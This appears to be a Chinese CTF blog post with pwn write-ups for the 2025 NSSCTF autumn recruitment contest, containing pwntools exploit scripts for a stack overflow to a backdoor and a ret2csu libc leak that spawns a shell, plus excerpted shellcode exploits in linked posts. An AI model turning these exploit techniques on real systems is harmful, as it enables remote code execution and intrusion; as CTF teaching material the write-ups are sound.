2025_NSSCTF秋季招新赛

Created2025-10-31|Updated2025-11-01|比赛

|Post Views:

hello_pwn

直接nc连接得flag，没什么说的。

haoo@haoo:~/Desktop$ nc node6.anna.nssctf.cn 24590
Welcome, ctfer, to NSSCTF 2025. We wish you a great time!
A journey of a thousand miles begins with a single step.
Go ahead and grab your first flag now!
ls
bin
bug
dev
flag
lib
lib32
lib64
libexec
libx32
cat flag
NSSCTF{e6f6b5fd-968d-4425-ac40-23a58494102f}

他得不到她

简单的栈溢出，存在后门函数，只是将system(‘/bin/sh’)换成了system(‘$0’)。

from pwn import*
context.arch='amd64'
context.os='linux'
io=remote('node6.anna.nssctf.cn',26589)
ret=0x040101a

payload=cyclic(40)+p64(0x0401203)
io.sendline(payload)

io.interactive()

__libc_csu_init()

简单的ret2csu，直接打。

from pwn import*
elf=ELF('./csu')
libc=ELF('./csulibc.so.6')
io=remote('node6.anna.nssctf.cn',29382)

rdi=0x04008b3
rsi_r15=0x04008b1
ret=0x04005b1
addr=0x0400746
write_plt=elf.plt['write']
write_got=elf.got['write']

payload=b'\x00'*(0x50+8)+p64(rdi)+p64(1)+p64(rsi_r15)+p64(write_got)+p64(8)+p64(write_plt)+p64(addr)
io.sendline(payload)
write=u64(io.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(write))

libc_base=write-libc.sym['write']
print("libc_base: ",hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+next(libc.search('/bin/sh'))

payload=b'\x00'*(0x50+8)+p64(rdi)+p64(bin_sh)+p64(system)+p64(addr)
io.sendline(payload)

io.interactive()

Author: Star

Link: http://example.com/2025/10/31/2025-NSSCTF%E7%A7%8B%E5%AD%A3%E6%8B%9B%E6%96%B0%E8%B5%9B/

Copyright Notice: All articles on this blog are licensed under CC BY-NC-SA 4.0 unless otherwise stated.

Related Articles

0xGame2024-复现

where_is_my_binsh 一道简单的题目，存在栈溢出以及system函数，没有/bin/sh\x00字符串，给了变量something的地址，那么就先输入/bin/sh\x00字符串再打ret2text。 from pwn import*io=remote('gz.imxbt.cn',20884)elf=ELF('./where_is_my_binsh')bin_sh=0x0404090system=elf.sym['system']ret=0x040101ardi=0x0401323io.sendlineafter('If you want it ,then you have to create...

2025_SWPU_NSSCTF_秋季招新训练赛

口算题卡一道计算题，主要考察脚本的编写，但因为没有时间限制，所以可以直接算100道题。 from pwn import*s = lambda buf: io.send(buf)sl = lambda buf: io.sendline(buf)sa = lambda delim, buf: io.sendafter(delim, buf)sal = lambda delim, buf: io.sendlineafter(delim, buf)r = lambda n=None: io.recv(n)ra = lambda t=tube.forever: io.recvall(t)ru = lambda delim: io.recvuntil(delim)rl = lambda: io.recvline()rls = lambda n=2**20: io.recvlines(n)su = lambda buf,addr: io.success(buf + "==>" + hex(addr))io =...

stack一道不错的题目，让我对pwndbg的使用进一步的熟练程序代码很简单，自定义输入字符串长度，通过循环不断输入，那么可以造成栈溢出，并且存在后门函数。但是此题的关键在于变量i会被覆盖，那么就会导致程序根据i将我们输入的东西写入到另一个地方。因此，我们可以找准i的偏移，防止其被覆盖，我们就可以正常栈溢出到返回地址。 from pwn import*io=remote('challenge.imxbt.cn',20197)#io=process('./stack')ret=0x040101abackdoor=0x4012E6def debug(): gdb.attach(io) ...

GeekChallenge2024

ez_shellcode简单的shellcode from pwn import*context.arch='amd64'io=remote('nc1.ctfplus.cn',39373)shellcode_addr=0x0401256shellcode=asm(shellcraft.sh())io.send(shellcode)payload=cyclic(0x18+8)+p64(shellcode_addr)io.sendline(payload)io.interactive() 你会栈溢出吗？简单的64位栈溢出，注意堆栈平衡 from pwn...

LilCTF2025_ret2all

Week1第一周的题都比较简单，就想说一下GNU那道比较新颖，挺好玩的。 GNU...

Loading Database